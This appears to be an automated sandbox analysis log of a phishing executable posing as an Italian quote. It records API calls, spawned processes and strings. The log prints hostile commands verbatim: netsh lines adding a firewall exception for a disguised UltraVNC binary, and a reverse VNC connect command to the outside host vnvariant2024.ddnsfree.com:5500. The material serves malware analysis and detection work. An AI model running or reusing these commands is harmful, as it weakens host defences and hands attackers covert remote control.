Source: C:\Games\taskhost.exe Code function: 41_2_001CD615 mov ecx, dword ptr fs:[00000030h] 41_2_001CD615
Source: C:\Games\taskhost.exe Code function: 41_2_001DC7F4 mov eax, dword ptr fs:[00000030h] 41_2_001DC7F4
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108A23A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 0_2_0108A23A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EC2520 __set_se_translator,SetUnhandledExceptionFilter, 0_2_00EC2520
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108ACAE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0108ACAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00EC5180 __set_se_translator,SetUnhandledExceptionFilter, 0_2_00EC5180
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_0108F843 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0108F843
Source: C:\Games\viewer.exe Code function: 6_2_00635248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00635248
Source: C:\Games\viewer.exe Code function: 6_2_00639256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00639256
Source: C:\Games\viewer.exe Code function: 6_2_006353DE SetUnhandledExceptionFilter, 6_2_006353DE
Source: C:\Games\viewer.exe Code function: 6_2_006347F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_006347F5
Source: C:\Games\taskhost.exe Code function: 41_2_001BC87C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 41_2_001BC87C
Source: C:\Games\taskhost.exe Code function: 41_2_001B8A67 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 41_2_001B8A67
Source: C:\Games\viewer.exe Code function: 6_2_00615210 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetModuleHandleW,GetProcAddress,CloseHandle,Sleep,Sleep,EnumWindows,BringWindowToTop, 6_2_00615210
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\once.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\viewer.exe C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="taskhost.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "taskhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Games\taskhost.exe C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" "
Source: C:\Games\viewer.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process created: C:\Windows\SysWOW64\msiexec.exe c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\photo and fax vn\photo and vn 1.1.2\install\f97891c\main1.msi" ai_setupexepath=c:\users\user\desktop\preventivo24.01.11.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1706008514 " ai_euimsi="
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FB9280 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification, 0_2_00FB9280
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Program Manager
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Shell_TrayWnd
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: Progman
Source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr Binary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: taskhost.exe.0.dr Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop
Source: C:\Games\viewer.exe Code function: 6_2_00635448 cpuid 6_2_00635448
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 0_2_00FEB480
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 6_2_0064F04D
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_0064F173
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 6_2_0064F279
Source: C:\Games\viewer.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_0064F348
Source: C:\Games\viewer.exe Code function: GetLocaleInfoEx,___wcsnicmp_ascii, 6_2_0063433F
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW, 6_2_006483B3
Source: C:\Games\viewer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW, 6_2_0063440A
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 6_2_0064ECD4
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 6_2_0064EC89
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 6_2_0064ED6F
Source: C:\Games\viewer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_0064EDFA
Source: C:\Games\viewer.exe Code function: EnumSystemLocalesW, 6_2_00647E3A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Games\taskhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01003AD0 CreateNamedPipeW,CreateFileW, 0_2_01003AD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00FF6820 GetLocalTime, 0_2_00FF6820
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_01002440 GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegDeleteValueW,RegCloseKey,RegQueryInfoKeyW,RegCloseKey,RegCloseKey,RegDeleteKeyW,RegCloseKey,RegDeleteValueW,RegCloseKey, 0_2_01002440
Source: C:\Games\viewer.exe Code function: 6_2_00648AB4 _free,GetTimeZoneInformation, 6_2_00648AB4
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00E87AA0 GetVersionExW,GetVersionExW,IsProcessorFeaturePresent, 0_2_00E87AA0

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL

Remote Access Functionality

Source: taskhost.exe, 00000029.00000002.3497479719.0000000003A6D000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: RFB 003.008
Source: taskhost.exe, 00000029.00000002.3496512970.000000000114E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: RFB 003.008